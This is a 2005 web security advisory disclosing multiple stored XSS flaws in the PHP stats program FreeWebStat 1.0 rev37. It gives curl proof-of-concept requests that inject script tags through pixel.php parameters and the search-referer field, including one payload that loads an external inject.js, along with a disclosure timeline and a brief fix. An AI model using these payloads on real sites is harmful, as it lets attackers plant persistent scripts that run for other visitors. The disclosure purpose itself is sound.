ush.it - a beautiful place

Free Web Stat Multiple XSS Vulnerabilities

November 25, 2005 at 2:15 am - Filed under Hacks, Language EN - 1095 words, reading time ~3 minutes - Permalink - Comments

FreeWebStat 1.0 rev37 (the last version at the write time) is vulnerable to multiple XSS. The impact is a little bigger since datas will be stored in a flat file and the result of a single query will persist for some time on the backend. A well-timed loop of requests will assure the XSS to be permanent.

This can be used to inject arbitrary JS code into the page and make the JS pseudo-permanent, so other users will execute the JS without the need of any special url.

FreeWebStat Multiple XSS Vulnerabilities

 Name              Multiple XSS Vulnerabilities in FreeWebStat
 Systems Affected  FreeWebStat (verified on 1.0 rev37)
 Severity          Medium Risk
 Vendor            www.freewebstat.com
 Advisory          http://www_ush_it/2005/11/25/free-web-stat/
 Author            Francesco "aScii" Ongaro (ascii at katamail . com)
 Date              20051125 

I. BACKGROUND

FreeWebStat is a PHP stats program, more information is
available at the vendor site.

II. DESCRIPTION

FreeWebStat 1.0 rev37 (the last version at the write time)
is vulnerable to multiple XSS. The impact is a little bugger
since datas will be stored to file and the result of a single
query will persist for some time on the backend. A well-timed
loop of requests will assure the XSS to be permanent.

We issued an advisory for an other application of the same
author called "Php Web Statistik Multiple Vulnerabilities"
who said "new version with all fixed bugs can be found
under www.freewebstat.com". Well, we downloaded this version
and seen the same type of vulnerabilities..

The old advisory:
http://www_ush_it/2005/11/19/php-web-statistik/

III. ANALYSIS

This vulnerability can be exploited by a GET query.

1) logdb.html XSS

logdb.html is vulnerable to JS injection using
anti-escape methods (eg: single quotes will be stripped
but there are a lot of working workrounds for this)

1.1) Curl the pixel.php

curl "http://local.asciistation.zapto.org/fws/pixel.php
?domain=<script>alert(1)</script>
&site=<script>alert(2)</script>
&jsref=<script>alert(3)</script>
&jsres=<script>alert(4)</script>
&jscolor=<script>alert(5)</script>"
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www_ush_it"

$site, $jsref, &jsres and $jscolor are vulnerable.

Loading an url in $jsref will give you a full link (if the logdb.html
page have any pr you can drain some of it.

1.2) Call stats.php

This will generate the new logdb.html file.

1.3) Visit logdb.html

You will see some alerts. : )

The order with the example query is 2 3 2 3 4 5.

1.4) Some test curls

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=<script>alert(123)&jsref=1024x768
&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=
lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red"
-e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=
10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=13
37&jscolor=red" -e "http://www.suma.it/" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=<script>alert(1)</script>&site=
<script>alert(2)&jsref=</script><script>alert(3)</script>
&jsres=<script>alert(4)</script>&jscolor=
<script>alert(5)</script>"
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www_ush_it"

2) stat.php search key XSS

2) Detecting the search key XSS

- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)

# save the referer except the own domain name.
if the browser value is empty, do not save
+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&
site=aa&jsref=sukasuka&jsres=1337&jscolor=red"

Will display as many "DEBUG sukasuka" under the header and over the
"summary" as the number of new queries.

# save the referer except the own domain name.
if the browser value is empty, do not save
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )

$logfile_entries[7] is the $jsref variable.

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=ssss&domain="

search words ( 1 ) lello splendor 100 % 1
search engines ( 1 ) Google 100 % 1

ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php? site=&jsres=&jscolor=&jsref=http://www.google.it/search? q=lello+splendor++&hl=it" ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php? site=&jsres=&jscolor=&jsref=http://www.google.it/search? q=<script>alert(123456789)</script>++&hl=it" Now the injection is executed in 2 points, the referer table and the keyword table. 2.2) Exploiting the search key XSS stat.php give us some tricks, and we are evil. The string will be lowered and any + or - char will became a (real, not a %20) space. $terms = str_replace( '\"', "", $terms ); # delete \" $terms = strtolower( $terms ); # string to lower $terms = str_replace( "+" , " ", $terms ); # replace + with space $terms = str_replace( "-" , " ", $terms ); # replace - with space ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site= &jsres=&jscolor=&jsref=http://www.google.it/search? q=ppoopp<script language="javascript"-src= "http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it" IV. DETECTION FreeWebStat 1.0 rev37 is vulnerable. Older version not verified. V. WORKAROUND Input validation will fix the vulnerability. VI. VENDOR RESPONSE Vendor will fix and release a new version. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20051125 Bug discovered 20051125 Developer notification 20051125 Advisory released 20051128 Vendor response IX. CREDIT ascii is credited with the discovery of this vulnerability. X. LEGAL NOTICES Copyright (c) 2005 Francesco ?aScii? Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
THP USH Wisec DigitalBullets